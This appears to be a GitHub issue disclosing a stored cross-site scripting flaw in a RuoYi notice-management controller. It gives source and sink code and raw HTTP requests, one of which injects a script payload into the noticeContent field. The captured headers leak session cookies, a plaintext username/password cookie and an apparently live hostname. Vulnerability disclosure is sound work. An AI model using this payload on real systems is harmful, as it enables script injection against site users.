Skip to content

Stored XSS vulnerability #294

New issue
New issue
Open
Open
Stored XSS vulnerability#294
@NinjaGPT

Description

@NinjaGPT
NinjaGPT
opened on Jul 8, 2025

Summary

When users add notification announcements, they can insert XSS payloads without any restrictions, which are then stored in the database. On the display page, the content is output without any encoding processing, resulting in stored XSS vulnerabilities.

Details

Taint Source:

  • com/ruoyi/web/controller/system/SysNoticeController.java
   @RequiresPermissions("system:notice:add")
    @Log(title = "通知公告", businessType = BusinessType.INSERT)
    @PostMapping("/add")
    @ResponseBody
    public AjaxResult addSave(@Validated SysNotice notice)
    {
        notice.setCreateBy(getLoginName());
        return toAjax(noticeService.insertNotice(notice));
    }

Taint Sink:

  • com/ruoyi/web/controller/system/SysNoticeController.java
    @RequiresPermissions("system:notice:edit")
    @GetMapping("/edit/{noticeId}")
    public String edit(@PathVariable("noticeId") Long noticeId, ModelMap mmap)
    {
        mmap.put("notice", noticeService.selectNoticeById(noticeId));
        return prefix + "/edit";
    }

POC

Injecting XSS payload

POST /system/notice/add HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 184
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://tonghu.phone4rent.com:8090
Referer: http://tonghu.phone4rent.com:8090/system/notice/add
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1728619084; _ga=GA1.1.1576547266.1728619085; username=test; password=123456; _ga_73YJPXJTLX=GS1.1.1728631376.2.0.1728631376.0.0.0; JSESSIONID=a05dcac6-d2f5-417c-be55-55140fd15c7f; rememberMe=xADWIbdMf6eu/6.................
Connection: close

noticeTitle=test&noticeType=1&noticeContent=%3Cp%3E%3Ca+href%3D%22http%3A%2F%2F1%22+target%3D%22_blank%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%3C%2Fa%3E%3Cbr%3E%3C%2Fp%3E&status=0

XSS will be triggered when access to the OUTPUT page.

GET /system/notice/edit/11 HTTP/1.1
Host: 127.0.0.1:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://tonghu.phone4rent.com:8090/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1728619084; _ga=GA1.1.1576547266.1728619085; username=test; password=123456; _ga_73YJPXJTLX=GS1.1.1728631376.2.0.1728631376.0.0.0; JSESSIONID=a05dcac6-d2f5-417c-be55-55140fd15c7f; rememberMe=xADWIbdMf6eu/6Jmw.......
Connection: close
Image Image

Impact

https://portswigger.net/web-security/cross-site-scripting#impact-of-xss-vulnerabilities

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions